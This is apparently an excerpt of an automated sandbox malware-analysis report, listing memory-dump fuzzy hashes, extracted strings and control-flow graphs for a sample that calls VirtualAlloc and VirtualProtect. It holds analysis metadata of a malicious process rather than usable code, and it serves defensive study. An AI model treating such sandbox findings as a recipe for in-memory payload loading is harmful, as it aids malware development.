                                                                                                                    • Opcode Fuzzy Hash: 722b7d09a3da5f298d46c8311e908dced07fc104a4f23c91bc6d4aa99059930b
                                                                                                                    • Instruction Fuzzy Hash: CBE08C01F1A61903EB68A9FC547A6B533D2EF98700F220235E04EC32F2DD38AD421240
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction ID: efca8cc2db5875ec3c0e08d5ad81cc4b52a224e46e3f77b68766f1ebfb8b33b2
                                                                                                                    • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction Fuzzy Hash: F1E01A74F0D61E87F768A688C8627E97265EF88300F150278DA1E937F1CE2CAE418655
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction ID: 172cd546862ac56252cd1f295eca16a0a6cfb85c91e2fbedd913172999d540fe
                                                                                                                    • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction Fuzzy Hash: 8CE01734B0930ECBE720EB94C4956EEB7A1EF51721F118766C401872F9EA78A784CA80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction ID: 60deb8c062751808bc93f184146684346ef2862575fe1d146fdd7938fea1528b
                                                                                                                    • Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction Fuzzy Hash: BFC0123062990E8FDA80BB28C888824BBA0FF0E301BDA18E0E00CCB1B1D61999908701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70dfd15de92720280ace9cd978483441caa22fb2408bbdc47ab4b125b5b05ef5
                                                                                                                    • Instruction ID: de597fa55665355bb1406378e4b19f18b81618159e6699874b791686d7f002da
                                                                                                                    • Opcode Fuzzy Hash: 70dfd15de92720280ace9cd978483441caa22fb2408bbdc47ab4b125b5b05ef5
                                                                                                                    • Instruction Fuzzy Hash: 1EC01201F0B61F00E82031EA24A30ACB1009FC4A10FD20232C009800B1980E22C60156
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: 2d1f1257cea26e7b06385fac8dd03f19bd777868958997b8fcdb7cf09d2f4caa
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: 92C08C3051180C8FC908EB28C88490433A0FF09200BC30090E009C7170D219DCC0C780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 555718bc160314ec4c7826c4d4092ea92db78b88135855282f337b5007ab4058
                                                                                                                    • Instruction ID: 1b828be7a788d8688e1afa36b7491d0bb9b6a9beae45559ab269d8e968e9a0f0
                                                                                                                    • Opcode Fuzzy Hash: 555718bc160314ec4c7826c4d4092ea92db78b88135855282f337b5007ab4058
                                                                                                                    • Instruction Fuzzy Hash: E6C08C00F0CD1B02F759A2042431A7E04029F80608F8207B0E81E877EECE0C1E0212CB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction ID: 01c3e374eea77e638630065b1219445ebd2a18699715889d2f11f2754a3a298d
                                                                                                                    • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction Fuzzy Hash: E8B01200D5750F00E42431FA189306574405F44100FC20270D40C501B1984D12D40252
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: 325cc8660a8b228ebcb307bf99baa3fd23ac291a958007da991e244d11b16cad
                                                                                                                    • Instruction ID: d880b3040255ccf01a5784be9c05eb18c6412bf6434959b0e42e2bc10fbd86fc
                                                                                                                    • Opcode Fuzzy Hash: 325cc8660a8b228ebcb307bf99baa3fd23ac291a958007da991e244d11b16cad
                                                                                                                    • Instruction Fuzzy Hash: 5241C20BF0D5A645E31973FC752A9ED6B648FC127EB1A86B7E15E890D78C08608183E5

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:4.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:6
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 32980 7ffd9b7cb4ba 32981 7ffd9b7cb4c9 VirtualProtect 32980->32981 32983 7ffd9b7cb5ae 32981->32983 32976 7ffd9b7cc491 32977 7ffd9b7cc49f VirtualAlloc 32976->32977 32979 7ffd9b7cc554 32977->32979

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5\_H
                                                                                                                    • API String ID: 0-3325266018
                                                                                                                    • Opcode ID: e5f4df37e138d00cb34f6cbf76eccba469a68c7a92ea50581934cf7972370ba3
                                                                                                                    • Instruction ID: 3055e40ef9087b1b198b96baec273ad81207112645b583e53055fae7985a2d64
                                                                                                                    • Opcode Fuzzy Hash: e5f4df37e138d00cb34f6cbf76eccba469a68c7a92ea50581934cf7972370ba3
                                                                                                                    • Instruction Fuzzy Hash: AE91E1B5A0DA899FE759DB6C8869BF97FE0EB95300F0501BED049D73E2DBB814108741

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: O_H
                                                                                                                    • API String ID: 0-1880849852
                                                                                                                    • Opcode ID: 66d71f42813f68f253ab06a6402b25eb3738d64536813b21a6dbadeb4276c28b
                                                                                                                    • Instruction ID: 8a68d62e643a88346b726e614c694c63639c98f3cbe40163828000a9a135472f
                                                                                                                    • Opcode Fuzzy Hash: 66d71f42813f68f253ab06a6402b25eb3738d64536813b21a6dbadeb4276c28b
                                                                                                                    • Instruction Fuzzy Hash: D762B531B1DA5E4BE7A8EB6C84A56B873A2FF94340F0506B9D40EC36F2DD287D858741

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 197 7ffd9b7cb4ba-7ffd9b7cb4c7 198 7ffd9b7cb4c9-7ffd9b7cb4d1 197->198 199 7ffd9b7cb4d2-7ffd9b7cb4e3 197->199 198->199 200 7ffd9b7cb4e5-7ffd9b7cb4ed 199->200 201 7ffd9b7cb4ee-7ffd9b7cb5ac VirtualProtect 199->201 200->201 205 7ffd9b7cb5b4-7ffd9b7cb5dc 201->205 206 7ffd9b7cb5ae 201->206 206->205
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c7000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 29c540e04edb50e6c73ded193e7089a6907f68db822979333902118ef7ddc2b1
                                                                                                                    • Instruction ID: c3b6827ffa347c9c1be3f4db245461bf5f744de1f75e708fb679e5e46dc019f3
                                                                                                                    • Opcode Fuzzy Hash: 29c540e04edb50e6c73ded193e7089a6907f68db822979333902118ef7ddc2b1
                                                                                                                    • Instruction Fuzzy Hash: 80412C3190C78C4FD7199BA898166F97FE0EF56321F0442AFD099D3293CA746406C792

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 242 7ffd9bbb6058-7ffd9bbb6070 244 7ffd9bbb6078-7ffd9bbb60a3 242->244 248 7ffd9bbb60cc-7ffd9bbb60d2 244->248 249 7ffd9bbb60d9-7ffd9bbb60df 248->249 250 7ffd9bbb60a5-7ffd9bbb60be 249->250 251 7ffd9bbb60e1-7ffd9bbb60e6 249->251 254 7ffd9bbb61b5-7ffd9bbb61c5 250->254 255 7ffd9bbb60c4-7ffd9bbb60c9 250->255 252 7ffd9bbb60ec-7ffd9bbb6121 251->252 253 7ffd9bbb5fd3-7ffd9bbb6018 251->253 253->249 258 7ffd9bbb601e-7ffd9bbb6024 253->258 263 7ffd9bbb61c7 254->263 264 7ffd9bbb61c8-7ffd9bbb6216 254->264 255->248 260 7ffd9bbb5fd5-7ffd9bbb61ad 258->260 261 7ffd9bbb6026 258->261 260->254 266 7ffd9bbb604f-7ffd9bbb6056 261->266 263->264 266->242 268 7ffd9bbb6028-7ffd9bbb6041 266->268 268->254 271 7ffd9bbb6047-7ffd9bbb604c 268->271 271->266
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: b2222862df1d5de7718418eb48ab102dbecc96b1f113b22db5c758329952e2e5
                                                                                                                    • Instruction ID: 489f7a90fbe543af2060e3461cc896ed975222ca0659faf49a3bf37fc28a7a30
                                                                                                                    • Opcode Fuzzy Hash: b2222862df1d5de7718418eb48ab102dbecc96b1f113b22db5c758329952e2e5
                                                                                                                    • Instruction Fuzzy Hash: BB515D71E0955E8FDB59DB98C4A05FEB7B1FF58304F1140BAC01AE72E6DA39AA05CB40

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 273 7ffd9bbb1008-7ffd9bbb1020 275 7ffd9bbb1028-7ffd9bbb1053 273->275 279 7ffd9bbb107c-7ffd9bbb1082 275->279 280 7ffd9bbb1089-7ffd9bbb108f 279->280 281 7ffd9bbb1055-7ffd9bbb106e 280->281 282 7ffd9bbb1091-7ffd9bbb1096 280->282 283 7ffd9bbb1165-7ffd9bbb1175 281->283 284 7ffd9bbb1074-7ffd9bbb1079 281->284 285 7ffd9bbb109c-7ffd9bbb10d1 282->285 286 7ffd9bbb0f83-7ffd9bbb0fc8 282->286 291 7ffd9bbb1177 283->291 292 7ffd9bbb1178-7ffd9bbb11c6 283->292 284->279 286->280 290 7ffd9bbb0fce-7ffd9bbb0fd4 286->290 293 7ffd9bbb0f85-7ffd9bbb115d 290->293 294 7ffd9bbb0fd6 290->294 291->292 293->283 298 7ffd9bbb0fff-7ffd9bbb1006 294->298 298->273 299 7ffd9bbb0fd8-7ffd9bbb0ff1 298->299 299->283 302 7ffd9bbb0ff7-7ffd9bbb0ffc 299->302 302->298
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: e5e48daf4eb93358cd7f827f4c04bf1939d87f2c89898451a63cb56eda1eb487
                                                                                                                    • Instruction ID: b68ecbcbf9d0bf44b38590d6c066316c8d4dd194cdb520577286235f459fe2bc
                                                                                                                    • Opcode Fuzzy Hash: e5e48daf4eb93358cd7f827f4c04bf1939d87f2c89898451a63cb56eda1eb487
                                                                                                                    • Instruction Fuzzy Hash: 5A517D31E1965E8FDB69DB98C4615BEB7B1FF45304F5141BAD01AE72E2CA342A01CF50

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 304 7ffd9b7cc491-7ffd9b7cc49d 305 7ffd9b7cc4a1-7ffd9b7cc4dd 304->305 306 7ffd9b7cc49f 304->306 307 7ffd9b7cc4e1-7ffd9b7cc552 VirtualAlloc 305->307 306->305 306->307 310 7ffd9b7cc55a-7ffd9b7cc582 307->310 311 7ffd9b7cc554 307->311 311->310
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c7000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: a9092333e41b68e541e5482c024632504f51d8fe71ed918b5106c66deba95a40
                                                                                                                    • Instruction ID: 774ff9e2aacdb946b964fac1b2ebc4baaa213d3aa01f6751ace0e1f8f2a1063c
                                                                                                                    • Opcode Fuzzy Hash: a9092333e41b68e541e5482c024632504f51d8fe71ed918b5106c66deba95a40
                                                                                                                    • Instruction Fuzzy Hash: 64313C31A0CB8C9FDB1DAB6898166F97BF0EF96321F00426FD04AC3653DA646816C7C1

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: SD
                                                                                                                    • API String ID: 0-68558722
                                                                                                                    • Opcode ID: eab4d841933ac42f57ad1587b19c711da5d4fc325e0ec2d09cf11b28a9864079
                                                                                                                    • Instruction ID: b58170a3c26bd85f5885e570ee7c86e1b277e222596dd19d4cfbffc8a824ad8c
                                                                                                                    • Opcode Fuzzy Hash: eab4d841933ac42f57ad1587b19c711da5d4fc325e0ec2d09cf11b28a9864079
                                                                                                                    • Instruction Fuzzy Hash: 08114F30B18A094FE798EBAC80A97B976E2FFDC351F15467ED04ED32A2CE34A9454741

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 328 7ffd9b7fa529-7ffd9b7fa53d 329 7ffd9b7fa53f-7ffd9b7fa55a 328->329 330 7ffd9b7fa55e-7ffd9b7fa563 329->330
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 97d10a51a792739250a071fd6c64afa6d95a0804de66281ebdccd864599b99b4
                                                                                                                    • Instruction ID: f6f9b689a6c39d3a3674ac9d8cd6810dd97dafa44aa53ee499078555cc270e9a
                                                                                                                    • Opcode Fuzzy Hash: 97d10a51a792739250a071fd6c64afa6d95a0804de66281ebdccd864599b99b4
                                                                                                                    • Instruction Fuzzy Hash: AEE06D61A0E7C84FC71AEA348869455BFA0EF6721174A42EEC445CF1A3EA2DC889CB01

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 331 7ffd9b7e93e9-7ffd9b7e9414 333 7ffd9b7e9418-7ffd9b7e941d 331->333
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7e3000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: d0e8cea4f4487dc42e39253ac8781d12e1397dfb5fa8099690c979fee741b53a
                                                                                                                    • Instruction ID: 6ddea67b02c1befec3562bb22ba9eb361fe512d853bfd110c8e7f21324a6500b
                                                                                                                    • Opcode Fuzzy Hash: d0e8cea4f4487dc42e39253ac8781d12e1397dfb5fa8099690c979fee741b53a
                                                                                                                    • Instruction Fuzzy Hash: BDE01A7294E7C48FCB56EB7488698547FA0EF6721078B41EEC189CF1B3E62D9859C701

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 334 7ffd9b7e9599-7ffd9b7e95c4 335 7ffd9b7e95c8-7ffd9b7e95cd 334->335
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7e3000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 86fdba8bcc8ff6d06c3a8f2be30c41855488a8295957d005536ad367a19cfaa5
                                                                                                                    • Instruction ID: 5741024008ba5ddaf6e81e97e4ed46709f3ceec525961b30a59a7685630887fe
                                                                                                                    • Opcode Fuzzy Hash: 86fdba8bcc8ff6d06c3a8f2be30c41855488a8295957d005536ad367a19cfaa5
                                                                                                                    • Instruction Fuzzy Hash: 2EE01A7154A3C04FCB0AEB7488A98543F70EE6721078A41DEC04ACF1B3E62D8949C701

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 336 7ffd9b7f1ad9-7ffd9b7f1aed 337 7ffd9b7f1aef-7ffd9b7f1b04 336->337 338 7ffd9b7f1b08-7ffd9b7f1b0d 337->338
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 240cc2e825c508d16e1213a973b643c109c08dacecd2e34d135dbaf9716fc776
                                                                                                                    • Instruction ID: 1f71fe56c67e7093e2e382f7cae8fb2463897a4eb62952b9c44baa99bb1dba6b
                                                                                                                    • Opcode Fuzzy Hash: 240cc2e825c508d16e1213a973b643c109c08dacecd2e34d135dbaf9716fc776
                                                                                                                    • Instruction Fuzzy Hash: 37E0126154F7C44FC716EB7588698557FA0DE6721078B41DEC085CF1B3D61D8849C701

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 339 7ffd9b7f7e19-7ffd9b7f7e2d 340 7ffd9b7f7e2f-7ffd9b7f7e44 339->340 341 7ffd9b7f7e48-7ffd9b7f7e4d 340->341
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 40685a9b3f447d7196ae1bbde28d49a1acb56669e412b342fc7c8109cb04019f
                                                                                                                    • Instruction ID: 1877705ac0316aac4945039b83593623636cfd311d7f17e7d13ecfbd1eea95fb
                                                                                                                    • Opcode Fuzzy Hash: 40685a9b3f447d7196ae1bbde28d49a1acb56669e412b342fc7c8109cb04019f
                                                                                                                    • Instruction Fuzzy Hash: 0DE01A6194F7C44FCB16EB7488698547FA1AE6721078B41EEC185CF1B3E62D8849C701

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4177267621.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b920000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce7eb88ab9804f724657164fdb1263617b5f350512db142aceab892757c1a69d
                                                                                                                    • Instruction ID: 2468a7b2febfc261cbadf68a689b2539b5802b17909fb403393fad7b3db3346f
                                                                                                                    • Opcode Fuzzy Hash: ce7eb88ab9804f724657164fdb1263617b5f350512db142aceab892757c1a69d
                                                                                                                    • Instruction Fuzzy Hash: 7D2250B1E1DA599FDB98EB1884A5EB8B7E1FBA8300F0441F9D04DD3292DE357981CB41

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a8184219564e7acb19d00b8df1d0935fb23b83968b531aca6762d1952c08e7ac
                                                                                                                    • Instruction ID: 74f794f5df82d57ee287a29f476781db66baffaac852ac304a5e4938b8858e0b
                                                                                                                    • Opcode Fuzzy Hash: a8184219564e7acb19d00b8df1d0935fb23b83968b531aca6762d1952c08e7ac
                                                                                                                    • Instruction Fuzzy Hash: BDF1E232B0EA1A8FD778CB99C4A157A77A1FF44308B11057EC45EC36E2DE29BA418B41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 280adca6f07cdfd5ce2977fb5bc515d5e26ee9580c97190258c72f4dbc8628c0
                                                                                                                    • Instruction ID: 5e64eca5604010061164ae6242ae7fe02b8d0af4c2e25de94556fcf8614439b2
                                                                                                                    • Opcode Fuzzy Hash: 280adca6f07cdfd5ce2977fb5bc515d5e26ee9580c97190258c72f4dbc8628c0
                                                                                                                    • Instruction Fuzzy Hash: F5D14931A1EF4D4FDBA5DB6888659A97BE1EF99340B0501BFD089C72A3DE24AC01C780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
